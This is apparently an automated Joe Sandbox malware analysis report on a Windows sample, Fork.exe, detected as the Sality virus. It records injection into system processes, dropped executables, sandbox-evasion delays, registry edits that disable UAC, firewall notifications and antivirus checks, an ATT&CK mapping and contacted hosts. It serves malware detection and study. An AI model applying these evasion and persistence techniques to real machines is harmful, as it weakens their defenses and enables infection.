      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: inputhost.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: coreuicomponents.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: propsys.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: uxtheme.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: urlmon.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: srvcli.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: netutils.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: dxgi.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: resourcepolicyclient.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: mrmcorer.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.staterepositoryclient.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: profapi.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: appxdeploymentclient.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: bcp47mrm.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: d3d11.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: d3d10warp.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: dxcore.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: d2d1.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: dwrite.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.applicationmodel.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: textshaping.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.shell.servicehostbuilder.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: execmodelproxy.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: rmclient.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: uiamanager.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.core.textinput.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.immersive.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: dataexchange.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: cryptbase.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.storage.applicationdata.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: logoncli.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.globalization.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.globalization.fontgroups.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: fontgroupsoverride.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.xaml.controls.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.energy.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.graphics.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: winrttracing.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.xaml.phone.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: directmanipulation.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: twinapi.dll
      Source: C:\Windows\System32\calc.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\calc.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\calc.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\calc.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\calc.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\calc.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\calc.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\calc.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\calc.exeSection loaded: ieframe.dll
      Source: C:\Windows\System32\calc.exeSection loaded: netapi32.dll
      Source: C:\Windows\System32\calc.exeSection loaded: version.dll
      Source: C:\Windows\System32\calc.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\calc.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: wkscli.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: edputil.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: mlang.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: wininet.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: policymanager.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: twinui.appcore.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: execmodelproxy.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: mrmcorer.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: windows.staterepositorycore.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: bcp47mrm.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: windows.ui.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: windowmanagementapi.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: textinputframework.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: inputhost.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: coremessaging.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: coreuicomponents.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: coremessaging.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: coremessaging.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: coreuicomponents.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: ieframe.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: netapi32.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: version.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\calc.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\Fork.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: C:\Users\user\Desktop\Fork.exe | File written: C:\Windows\system.ini
      Source: C:\Windows\System32\calc.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

      Data Obfuscation

      Source: Yara match | File source: Fork.exe, type: SAMPLE
      Source: Yara match | File source: 0.0.Fork.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Fork.exe | Static PE information: section name: .code
      Source: Fork.exe | Static PE information: section name: .rsrc entropy: 7.769782214367897
      Source: winrhbwc.exe.0.dr | Static PE information: section name: .text entropy: 7.991470433119
      Source: doxt.pif.0.dr | Static PE information: section name: .text entropy: 7.991470433119

      Persistence and Installation Behavior

      Source: C:\Users\user\Desktop\Fork.exe | File created: C:\doxt.pif
      Source: C:\Users\user\Desktop\Fork.exe | File created: C:\Users\user\AppData\Local\Temp\winrhbwc.exe
      Source: C:\Users\user\Desktop\Fork.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
      Source: C:\Users\user\Desktop\Fork.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Fork.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Fork.exe | Thread delayed: delay time: 180000
      Source: C:\Users\user\Desktop\Fork.exe | Thread delayed: delay time: 300000
      Source: C:\Users\user\Desktop\Fork.exe | Thread delayed: delay time: 360000
      Source: C:\Users\user\Desktop\Fork.exe | Thread delayed: delay time: 2100000
      Source: C:\Users\user\Desktop\Fork.exe | Thread delayed: delay time: 2400000
      Source: C:\Users\user\Desktop\Fork.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winrhbwc.exe
      Source: C:\Users\user\Desktop\Fork.exe | Dropped PE file which has not been started: C:\doxt.pif
      Source: C:\Users\user\Desktop\Fork.exe TID: 7136 | Thread sleep time: -120000s >= -30000s
      Source: C:\Users\user\Desktop\Fork.exe TID: 7144 | Thread sleep time: -180000s >= -30000s
      Source: C:\Users\user\Desktop\Fork.exe TID: 7160 | Thread sleep time: -300000s >= -30000s
      Source: C:\Users\user\Desktop\Fork.exe TID: 7116 | Thread sleep count: 43 > 30
      Source: C:\Users\user\Desktop\Fork.exe TID: 7152 | Thread sleep time: -40000s >= -30000s
      Source: C:\Users\user\Desktop\Fork.exe TID: 6872 | Thread sleep time: -140000s >= -30000s
      Source: C:\Users\user\Desktop\Fork.exe TID: 6872 | Thread sleep time: -147000s >= -30000s
      Source: C:\Users\user\Desktop\Fork.exe TID: 6868 | Thread sleep time: -720000s >= -30000s
      Source: C:\Users\user\Desktop\Fork.exe TID: 6868 | Thread sleep time: -320000s >= -30000s
      Source: C:\Users\user\Desktop\Fork.exe TID: 7144 | Thread sleep time: -8400000s >= -30000s
      Source: C:\Users\user\Desktop\Fork.exe TID: 7160 | Thread sleep time: -9600000s >= -30000s
      Source: C:\Users\user\Desktop\Fork.exe | Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: C:\Users\user\Desktop\Fork.exe | Thread delayed: delay time: 120000
      Source: C:\Users\user\Desktop\Fork.exe | File opened: C:\Users\user\AppData\
      Source: C:\Users\user\Desktop\Fork.exe | File opened: C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.tmp
      Source: C:\Users\user\Desktop\Fork.exe | File opened: C:\Users\user\AppData\Local\
      Source: C:\Users\user\Desktop\Fork.exe | File opened: C:\Users\user\AppData\Local\Temp\6028.tmp
      Source: C:\Users\user\Desktop\Fork.exe | File opened: C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp
      Source: C:\Users\user\Desktop\Fork.exe | File opened: C:\Users\user\
      Source: dwm.exe, 0000000B.00000000.1016198831.0000013D2CB51000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000%
      Source: dwm.exe, 0000000B.00000000.1016198831.0000013D2CAF0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
      Source: C:\Users\user\Desktop\Fork.exe | Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\Fork.exe | Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\Desktop\Fork.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: E20000 protect: page execute and read and write
      Source: C:\Users\user\Desktop\Fork.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: D00000 protect: page execute and read and write
      Source: C:\Users\user\Desktop\Fork.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 3D0000 protect: page execute and read and write
      Source: C:\Users\user\Desktop\Fork.exe | Memory written: C:\Windows\System32\fontdrvhost.exe base: E20000
      Source: C:\Users\user\Desktop\Fork.exe | Memory written: C:\Windows\System32\fontdrvhost.exe base: D00000
      Source: C:\Users\user\Desktop\Fork.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.bat C:\Users\user\Desktop\Fork.exe"
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: dwm.exe, 0000000B.00000000.1007773782.0000013D2AAA0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000000.1007420954.0000013D2A647000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
      Source: dwm.exe, 0000000B.00000000.1007773782.0000013D2AAA0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
      Source: dwm.exe, 0000000B.00000000.1007773782.0000013D2AAA0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
      Source: dwm.exe, 0000000B.00000000.1007773782.0000013D2AAA0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
      Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe | Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe | Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe | Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe | Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings

      Source: C:\Users\user\Desktop\Fork.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverride
      Source: C:\Users\user\Desktop\Fork.exe Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShell
      Source: C:\Users\user\Desktop\Fork.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
      Source: C:\Users\user\Desktop\Fork.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
      Source: C:\Users\user\Desktop\Fork.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc
      Source: C:\Users\user\Desktop\Fork.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DisableNotifications
      Source: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile Registry value created: DisableNotifications 1
      MITRE ATT&CK Matrix (one line per tactic; a number in parentheses is the count the report attaches to that technique)

      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
      Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
      Initial Access: Replication Through Removable Media (11); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
      Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
      Persistence: Windows Service (1); Scripting (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
      Privilege Escalation: Windows Service (1); Process Injection (212); DLL Side-Loading (1); Bypass User Account Control (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
      Defense Evasion: Masquerading (1); Disable or Modify Tools (6); Virtualization/Sandbox Evasion (21); Process Injection (212); Obfuscated Files or Information (1); Software Packing (2); DLL Side-Loading (1); Bypass User Account Control (1)
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
      Discovery: Security Software Discovery (1); Process Discovery (2); Virtualization/Sandbox Evasion (21); Peripheral Device Discovery (11); File and Directory Discovery (3); System Information Discovery (12); Remote System Discovery; System Owner/User Discovery
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
      Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
      Command and Control: Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
      Impact: Inhibit System Recovery (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
      Source | Detection | Scanner | Label
      Fork.exe | 86% | Virustotal |
      Fork.exe | 97% | ReversingLabs | Win32.Virus.Sality
      Fork.exe | 100% | Avira | W32/Sality.AT

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Temp\winrhbwc.exe | 100% | Avira | W32/Sality.AT
      C:\doxt.pif | 100% | Avira | W32/Sality.AT

      No Antivirus matches
      No Antivirus matches
IP | Domain | Country | ASN | ASN Name | Malicious
3.229.117.57 | arimaexim.com | United States | 14618 | AMAZON-AESUS | false
46.98.127.9 | unknown | Ukraine | 15377 | FREGATUA | false
                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1640074
                                                    Start date and time:2025-03-16 23:03:16 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 25s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:39
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:3
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Sample name:Fork.exe
                                                    Detection:MAL
                                                    Classification:mal100.spre.troj.evad.winEXE@149/5@30/2
                                                    EGA Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Connection to analysis system has been lost, crash info: Unknown
                                                    • Exclude process from analysis (whitelisted): SIHClient.exe, ApplicationFrameHost.exe
                                                    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 20.3.187.198
                                                    • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
